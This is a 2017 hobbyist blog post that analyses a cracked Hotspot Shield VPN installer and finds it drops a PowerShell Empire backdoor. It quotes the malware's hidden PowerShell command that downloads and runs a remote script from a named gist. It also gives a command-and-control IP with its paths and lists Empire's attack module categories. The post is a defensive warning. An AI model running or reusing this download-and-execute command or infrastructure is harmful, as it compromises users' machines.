vineri, 1 decembrie 2017

Malware research/reverse – Payload backdoor

Hello.
I have some free time and I try to deal with internet safety. I’m just a small drop of the ocean, but I’m here!
Today I will introduce you something different.
As usual, I downloaded a few softwares and started the analysis.
I have a ”great offer”:
Hotspot Shield VPN 7.20.8.Elite Cracked

Woooow!!!(just kidding)
We have 3 important files.
Setup.exe and Update.exe appear to be archived files and from previous posts we know what this means, but today our target is the HSS v.2.exe file.


It is noticed that it is the latest file created.
Also, the installation method requires using this file.

OK.Let’s scan this time!
Virus Total Report

20/68 detection?!?
I mean, only 20 of the antivirus applications will see this file as a virus.

OK. It’s normal to be seen by antivirus. It’s just a crack, a patch, etc. You have to disable the antivirus to install it, it’s just a pirated software.
Let’s get started
It looks like this .exe is actually a .rar archive

After opening, he has a lot of work in the background.
We let him do the job to find out what he is doing!

When everything is quiet, we see that something is left to work.

powershell.exe -nop -windowstyle Hidden -c “IEX (New-Object Net.WebClient).DownloadString(‘https://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1
The virus runs through the application Powershell.exe, being connected to external sources.
h**ps://sgist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1raw9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1
Also connectiong to:
http://83.251.132.4
/admin/get.php
/login/process.php
/news.php

After investigation I found out that it’s about a payload project.

Currently Empire Power Shell has the following categories for modules:
  • Code Execution – Ways to run more code
  • Collection – Post exploitation data collection
  • Credentials – Collect and use creds
  • Exfiltration – Identify egress channels
  • Lateral Movement – Move around the network
  • Management – Host management and auxilary
  • Persistence – Survive reboots
  • Privesc – Privilege escalation capabilities
  • Recon – Test further entry points (HTTP Basic Auth etc)
  • Situational Awareness – Network awareness
  • Trollsploit – For the lulz
Prodefence.org
What can I say …. be careful!
Have fun & stay safe!!!
la
Etichete: , , , , , ,

Niciun comentariu:

Trimiteți un comentariu

Abonați-vă la: Postare comentarii (Atom)